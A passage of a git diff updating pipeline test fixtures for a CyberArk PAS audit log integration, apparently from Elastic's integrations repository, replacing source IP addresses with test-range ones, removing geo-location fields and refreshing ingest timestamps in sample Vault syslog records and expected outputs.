\u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Disable Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eMaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Disable Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"(CPM)MaxRetries\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"5\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 05:57:13\",\"IsoTimestamp\":\"2021-03-15T12:57:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"130\",\"Desc\":\"CPM Disable Password\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Disable Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Disable Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"CPMDisabled\",\"Value\":\"(CPM)MaxRetries\"},{\"Name\":\"RetriesCount\",\"Value\":\"5\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813031\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "130", "kind": "event", "action": "cpm disable password", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json index c1b0d793e2a..aa9a17269aa 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-178-get-user-s-details.log-expected.json @@ -48,7 +48,7 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:28.561257100Z", + "ingested": "2021-12-09T13:36:37.727184900Z", "original": "\u003c7\u003e1 2021-03-11T18:45:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:45:23\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:45:23Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e178\u003c/MessageID\u003e\\n \u003cDesc\u003eGet User's Details\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eGet User's Details\u003c/Action\u003e\\n \u003cSourceUser\u003eMaster\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eGet User's Details\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:45:23\",\"IsoTimestamp\":\"2021-03-11T18:45:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"178\",\"Desc\":\"Get User's Details\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Get User's Details\",\"SourceUser\":\"Master\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Get User's Details\",\"GatewayStation\":\"\"}}}", "code": "178", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log index 78ec9f57fe6..e9e3529abd7 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log @@ -1,12 +1,12 @@ -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T17:59:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:19","IsoTimestamp":"2021-03-10T17:59:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T17:59:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:27","IsoTimestamp":"2021-03-10T17:59:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T22:19:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:06","IsoTimestamp":"2021-03-10T22:19:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T22:19:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:15","IsoTimestamp":"2021-03-10T22:19:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_VAGRANT\n \n \n \n 81.32.170.205\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_VAGRANT\n \n \n \n 81.32.170.205\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_SSH\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_SSH\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_SSH","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_asr-cyberark-psm-ssh","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T17:59:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:19","IsoTimestamp":"2021-03-10T17:59:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T17:59:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:27","IsoTimestamp":"2021-03-10T17:59:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T22:19:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:06","IsoTimestamp":"2021-03-10T22:19:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T22:19:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:15","IsoTimestamp":"2021-03-10T22:19:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_VAGRANT\n \n \n \n 67.43.156.13\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_VAGRANT\n \n \n \n 67.43.156.13\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_SSH\n \n \n \n 67.43.156.15\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_SSH\n \n \n \n 67.43.156.15\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_SSH","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n \n 67.43.156.15\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_asr-cyberark-psm-ssh","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json index a47fbac5093..e19f27f504a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-180-add-user.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -40,7 +28,7 @@ "PSMPApp_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -48,7 +36,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add User", "source_user": "PSMPApp_localhost.localdomain", "message": "Add User", @@ -62,8 +50,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586584800Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPApp_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830911800Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPApp_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -89,20 +77,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -122,7 +98,7 @@ "PSMPGW_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, 